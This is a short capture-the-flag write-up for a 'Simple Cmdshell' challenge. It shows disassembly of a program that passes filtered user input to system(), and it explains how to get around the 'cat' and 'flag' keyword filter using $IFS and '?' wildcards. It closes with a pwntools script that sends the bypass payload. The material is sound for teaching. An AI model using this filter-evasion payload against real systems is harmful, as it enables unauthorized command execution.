# [PWNABLE] Simple Cmdshell :::warning Copyrightⓒ2021 by CSTEC. All contents cannot be copied without permission. ::: ## Analysis A program that mimics the Windows cmd.exe interactive shell. ``` root@computer:~# nc 0 7147 Microsoft Windows [Version 10.0.18363.836] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\user> ``` ## Vulnerability ```c .text:00000000000008A7 1018 48 8D 85 F0 EF FF FF lea rax, [rbp+haystack] .text:00000000000008AE 1018 48 89 C6 mov rsi, rax .text:00000000000008B1 1018 48 8D 3D DF 00 00 00 lea rdi, a4096s ; "%4096s" .text:00000000000008B8 1018 B8 00 00 00 00 mov eax, 0 .text:00000000000008BD 1018 E8 0E FE FF FF call ___isoc99_scanf .text:00000000000008C2 1018 48 8D 85 F0 EF FF FF lea rax, [rbp+haystack] .text:00000000000008C9 1018 48 8D 35 CE 00 00 00 lea rsi, needle ; "flag" .text:00000000000008D0 1018 48 89 C7 mov rdi, rax ; haystack .text:00000000000008D3 1018 E8 08 FE FF FF call _strstr .text:00000000000008D8 1018 48 85 C0 test rax, rax .text:00000000000008DB 1018 75 B2 jnz short loc_88F .text:00000000000008DD 1018 48 8D 85 F0 EF FF FF lea rax, [rbp+haystack] .text:00000000000008E4 1018 48 8D 35 B8 00 00 00 lea rsi, aCat ; "cat" .text:00000000000008EB 1018 48 89 C7 mov rdi, rax ; haystack .text:00000000000008EE 1018 E8 ED FD FF FF call _strstr .text:00000000000008F3 1018 48 85 C0 test rax, rax .text:00000000000008F6 1018 75 97 jnz short loc_88F .text:00000000000008F8 1018 48 8D 85 F0 EF FF FF lea rax, [rbp+haystack] .text:00000000000008FF 1018 48 89 C7 mov rdi, rax ; command .text:0000000000000902 1018 E8 99 FD FF FF call _system ``` Filtering the 'cat', 'flag' string prevents reading the flag using the 'cat flag' command. However, using the environment variable '$IFS' of the Linux shell one can add a space character and using a '?' wild card character filter can be bypassed. ## Exploit ```python from pwn import * io = remote('0', 7147) io.sendlineafter('C:\\Users\\user>', '/bin/ca?$IFS/home/simple_cmdshell/fla?') io.interactive() ```